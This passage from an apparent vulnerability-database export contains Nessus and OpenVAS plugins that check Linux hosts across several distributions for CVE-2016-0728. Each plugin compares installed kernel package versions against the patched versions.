Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88011);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"USN\", value:\"2870-2\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux-lts-trusty vulnerability (USN-2870-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2870-2/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.13-generic and / or\nlinux-image-3.13-generic-lpae packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2870-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.13.0-76-generic\", pkgver:\"3.13.0-76.120~precise1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.13.0-76-generic-lpae\", pkgver:\"3.13.0-76.120~precise1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.13-generic / linux-image-3.13-generic-lpae\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": 
"2019-05-29T18:35:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-01-20T00:00:00", "id": "OPENVAS:1361412562310842608", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842608", "type": "openvas", "title": "Ubuntu Update for linux-lts-wily USN-2872-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-lts-wily USN-2872-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842608\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-20 06:16:24 +0100 (Wed, 20 Jan 2016)\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-wily USN-2872-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-wily'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Yevgeny Pats discovered that the session\n keyring implementation in the Linux kernel did not properly reference count\n when joining an existing session keyring. 
A local attacker could use this to\n cause a denial of service (system crash) or possibly execute arbitrary code\n with administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux-lts-wily on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2872-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2872-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-25-generic\", ver:\"4.2.0-25.30~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-25-generic-lpae\", ver:\"4.2.0-25.30~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-25-lowlatency\", ver:\"4.2.0-25.30~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-25-powerpc-e500mc\", ver:\"4.2.0-25.30~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-25-powerpc-smp\", ver:\"4.2.0-25.30~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-25-powerpc64-emb\", 
ver:\"4.2.0-25.30~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-25-powerpc64-smp\", ver:\"4.2.0-25.30~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2016-01-26T00:00:00", "id": "OPENVAS:1361412562310871546", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871546", "type": "openvas", "title": "RedHat Update for kernel RHSA-2016:0064-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2016:0064-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871546\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-26 06:10:44 +0100 (Tue, 26 Jan 2016)\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for kernel RHSA-2016:0064-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux\nkernel, the core of any Linux operating system.\n\n * A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in certain\nerror path of the join_session_keyring() function. A local, unprivileged\nuser could use this flaw to escalate their privileges on the system.\n(CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for\nreporting this issue.\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. 
The system must be\nrebooted for this update to take effect.\");\n script_tag(name:\"affected\", value:\"kernel on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:0064-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-January/msg00033.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-debuginfo\", rpm:\"kernel-tools-debuginfo~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf-debuginfo\", rpm:\"python-perf-debuginfo~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2019-05-29T18:35:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "description": "Oracle Linux Local Security Checks ELSA-2016-3510", "modified": "2019-03-14T00:00:00", "published": "2016-01-21T00:00:00", "id": "OPENVAS:1361412562310122851", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122851", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2016-3510", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2016-3510.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122851\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-01-21 07:29:49 +0200 (Thu, 21 Jan 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2016-3510\");\n script_tag(name:\"insight\", value:\"ELSA-2016-3510 - kernel-uek security update. 
Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2016-3510\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2016-3510.html\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(7|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"dtrace-modules\", rpm:\"dtrace-modules~4.1.12~32.1.2.el7uek~0.5.1~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek\", rpm:\"kernel-uek~4.1.12~32.1.2.el7uek\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~4.1.12~32.1.2.el7uek\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~4.1.12~32.1.2.el7uek\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~4.1.12~32.1.2.el7uek\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if 
((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~4.1.12~32.1.2.el7uek\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-firmware\", rpm:\"kernel-uek-firmware~4.1.12~32.1.2.el7uek\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"dtrace-modules\", rpm:\"dtrace-modules~4.1.12~32.1.2.el6uek~0.5.1~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek\", rpm:\"kernel-uek~4.1.12~32.1.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~4.1.12~32.1.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~4.1.12~32.1.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~4.1.12~32.1.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~4.1.12~32.1.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-firmware\", rpm:\"kernel-uek-firmware~4.1.12~32.1.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "description": "Mageia Linux Local Security Checks mgasa-2016-0033", "modified": "2019-03-14T00:00:00", "published": "2016-01-25T00:00:00", "id": 
"OPENVAS:1361412562310131197", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310131197", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2016-0033", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2016-0033.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.131197\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-01-25 07:27:45 +0200 (Mon, 25 Jan 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2016-0033\");\n script_tag(name:\"insight\", value:\"Perception Point Research Team found a reference leak in keyring in join_session_keyring() that can be exploited to successfully escalate privileges from a local user to root (CVE-2016-0728). 
Other fixes in this kernel update: - netfilter: nf_nat_redirect: add missing NULL pointer check\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2016-0033.html\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2016-0033\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.1.15~2.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kernel-userspace-headers\", rpm:\"kernel-userspace-headers~4.1.15~2.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-vboxadditions\", rpm:\"kmod-vboxadditions~5.0.12~2.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-virtualbox\", rpm:\"kmod-virtualbox~5.0.12~2.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-xtables-addons\", rpm:\"kmod-xtables-addons~2.7~8.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = 
isrpmvuln(pkg:\"kmod-broadcom-wl\", rpm:\"kmod-broadcom-wl~6.30.223.271~5.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-fglrx\", rpm:\"kmod-fglrx~15.200.1046~9.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-nvidia304\", rpm:\"kmod-nvidia304~304.128~5.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-nvidia340\", rpm:\"kmod-nvidia340~340.93~5.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-nvidia-current\", rpm:\"kmod-nvidia-current~346.96~5.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "description": "Check the version of kernel", "modified": "2019-03-08T00:00:00", "published": "2016-01-26T00:00:00", "id": "OPENVAS:1361412562310882377", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882377", "type": "openvas", "title": "CentOS Update for kernel CESA-2016:0064 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2016:0064 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or 